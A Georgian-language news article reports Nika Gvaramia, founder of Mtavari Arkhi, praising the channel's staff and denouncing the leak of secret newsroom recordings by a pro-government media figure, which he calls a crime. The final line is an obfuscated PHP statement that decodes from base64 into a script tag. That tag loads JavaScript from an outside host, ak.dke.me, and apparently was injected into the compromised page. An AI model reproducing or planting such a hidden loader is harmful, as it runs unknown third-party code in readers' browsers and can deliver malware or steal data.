celsiusi
ავერსი საქკაბელი
"მთავარი არხის" დამფუძნებელმა, ნიკა გვარამიამ პროცესზე "მთავარი არხის" თითოეულ წარმომადგენელს მიმართა და თქვა, რომ ამ არხმა ბოლო 2 თვის განმავლობაში, მიუხედავად სირთულეებისა, აჩვენა მუშაობის მაღალი ხარისხი და პროფესიონალიზმი. 
 
ნიკა გვარამიამ მიმართვაში "მთავარი არხის" ნიუსრუმიდან გავრცელებულ ფარულ ჩანაწერებზეც ისაუბრა, რომელიც სამთავრობო მედიის წარმომადგენელმა, გია გაჩეჩილაძემ გაავრცელა. 
 
"ყოველგვარი გადაჭარბების გარეშე მინდა, მთავარ არხს მადლობა ვუთხრა და მივულოცო, რომ ძალიან გაიზარდნენ ამასობაში. შეუძლიათ, თავისუფალ ცურვაში საკუთარი თავის მართვაც, საუკეთესო ხარისხის პროდუქტის დადებაც. მე ძალიან ვამაყობ ამით და ძალიან მადლობელიც ვარ. იმიტომ, რომ ვიცი, რას უკავშირდება მათი ბოლო 2 თვის მუშაობა. 
 
ყველაფერთან ერთად, ეხლა მოვისმინეთ რაღაც ფარული ჩანაწერები, სრულიად სამარცხვინო მედიასაშუალების წარმომადგენლისგან - წარმომადგენელს ვუწოდებ სამარცხვინოს და არა მედიასაშუალებას. მეტსაც გეტყვით, ის რაც მოხდა, არის არა მხოლოდ ჟურნალისტური სტანდარტის დარღვევა, არამედ პირადი საუბრების გამოქვეყნება და ესეც დანაშაულია, მინდა, შევახსენო ყველას. უცნობის კი არა, ძალიან კარგად ნაცნობი სამარცხვინო ფიგურის მიერ ჩადენილ იქნა არა ჟურნალისტური ეთიკის დარღვევა მხოლოდ, არამედ დანაშაულის. იმიტომ, რომ აბსოლუტურად არანაირი საჯარო ინტერესის და არანაირი მამხილებელი ინფორმაციის შემცველი ტექსტი გავრცელდა, პირადი საუბარი სწორედ რომ.
 
პირადი საუბარი არ ნიშნავს მხოლოდ ინტიმურ ურთიერთობებს, თავისთავად ცხადია. და ეს არის დანაშაული ქართული კანონმდებლობით, ამიტომ არა მხოლოდ ის უნდა ვეძებოთ ვინც ეს ყველაფერი გააკეთა, და მე სრულიად დარწმუნებული ვარ ვისი გაკეთებულიც არის და ტექნიკურად გასაგებია, რომ ეს კომპიუტერის, ან ტელეფონის დავირუსების მეშვეობით მოხდა, მაგრამ ასევე, უნდა ვეძებოთ ისიც, ვინც ეს გაავრცელა. გამავრცელებელი არის შემსრულებელი. თუ იარსებებენ შემსრულებლები ყოველთვის იქნებიან უკანონო დავალებების მიმცემები" - თქვა ნიკა გვარამიამ. 
 
ნიკა გვარამიამ ხაზგასმით აღნიშნა, რომ შემსრულებელმა რგოლმა უნდა იცოდეს, რომ მათთან დაკავშირებით კონსესუსი ვერ შედგება, რადგან არ არის ეს არც პოლიტიკური და არც საქვეყნო ინტერესი. ნიკა გვარამიას თქმით, შემსრულებლებმა უნდა იცოდნენ, რომ მათი დამკვეთები შეიძლება, დარჩნენ დაუსჯელები, მაგრამ ისინი დაისჯებიან. 
510
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");